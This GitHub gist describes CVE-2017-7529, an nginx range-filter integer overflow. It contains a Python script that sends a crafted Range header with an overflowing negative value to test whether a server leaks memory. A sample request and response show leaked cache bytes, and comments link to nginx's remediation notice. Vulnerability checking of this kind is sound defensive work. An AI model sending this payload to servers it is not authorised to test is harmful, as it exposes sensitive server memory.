Skip to content

Instantly share code, notes, and snippets.

@thehappydinoa
Last active November 27, 2022 18:07
Show Gist options
  • Star 15 You must be signed in to star a gist
  • Fork 4 You must be signed in to fork a gist
  • Save thehappydinoa/bc3278aea845b4f578362e9363c51115 to your computer and use it in GitHub Desktop.
Save thehappydinoa/bc3278aea845b4f578362e9363c51115 to your computer and use it in GitHub Desktop.
Nginx - Remote Integer Overflow Vulnerability

CVE 2017-7529

Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.

Make sure requests is installed

Usage

usage: python CVE_2017_7529.py [-h] url

Nginx - Remote Integer Overflow Vulnerability - CVE 2017-7529

positional arguments:
  url         URL to test

optional arguments:
  -h, --help  show this help message and exit

Requests

GET /proxy/demo.png HTTP/1.1
Accept-Encoding: identity
Range: bytes=-17208,-9223372036854758792
Host: 127.0.0.1:8000
Connection: close
User-Agent: Python-urllib/2.7

HTTP/1.1 206 Partial Content
Server: nginx/1.13.1
Date: Mon, 14 Aug 2017 05:53:54 GMT
Content-Type: multipart/byteranges; boundary=00000000000000000002
Connection: close
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
X-Proxy-Cache: HIT


--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-16584/16585

.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
KEY: httpGET127.0.0.1/proxy/demo.png
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2017 05:51:46 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
Accept-Ranges: bytes
Content-Length: 16585
Connection: close
Content-Type: image/png
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Nginx - Remote Integer Overflow Vulnerability
# CVE-2017-7529
import sys
import logging
import argparse
try:
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except ImportError:
print("Please install the requests module.")
sys.exit(1)
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
def send_request(url, headers=None, timeout=8):
kwargs = {"headers": headers, "timeout": timeout, "verify": False}
response = requests.get(url, **kwargs)
http_headers = response.headers
log.info("status: %s" % response.status_code)
log.info("server: %s" % http_headers.get("Server", ""))
return response
def exploit(url):
log.info("target: %s", url)
response = send_request(url)
content_length = response.headers.get("Content-Length", 0)
bytes_length = int(content_length) + 623
content_length = "bytes=-%d,-9223372036854%d" % (
bytes_length,
776000 - bytes_length,
)
response = send_request(url, headers={"Range": content_length})
if response.status_code == 206 and "Content-Range" in response.headers:
log.info("vulnerable?: Vulnerable to CVE-2017-7529")
elif response.status_code == 416:
log.warn("vulnerable?: Not Vulnerable (Range Not Satisfiable)")
else:
log.info("vulnerable?: Unknown (%s)" % response.status_code)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Nginx - Remote Integer Overflow Vulnerability - CVE 2017-7529"
)
parser.add_argument("url", help="URL to test", type=str)
args = parser.parse_args()
url = requests.utils.urlparse(args.url)
if not url.scheme:
print(
"URL scheme specifier is missing. Please include either 'http://' or 'https://'."
)
sys.exit(1)
if not url.path:
print("URL path is missing. Please include a full path.")
sys.exit(1)
exploit(args.url)
@unknownfeature
Copy link

Folks! If you are using this script and getitng an error but can't look at the code and figure it out, please, start doing somethign else!
To author: thank you very much!

@dimassahid
Copy link

I got vulnerable on my website using this code, then what should I do for next? and what's proof that's vulnerable? cause I just got status vulnerable not a sensitive data or others

@thehappydinoa
Copy link
Author

@dimas354313 to protect yourself use these remediation steps: https://mailman.nginx.org/pipermail/nginx-announce/2017/000200.html

@dimassahid
Copy link

@thehappydinoa oke thanks a lot for your response

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment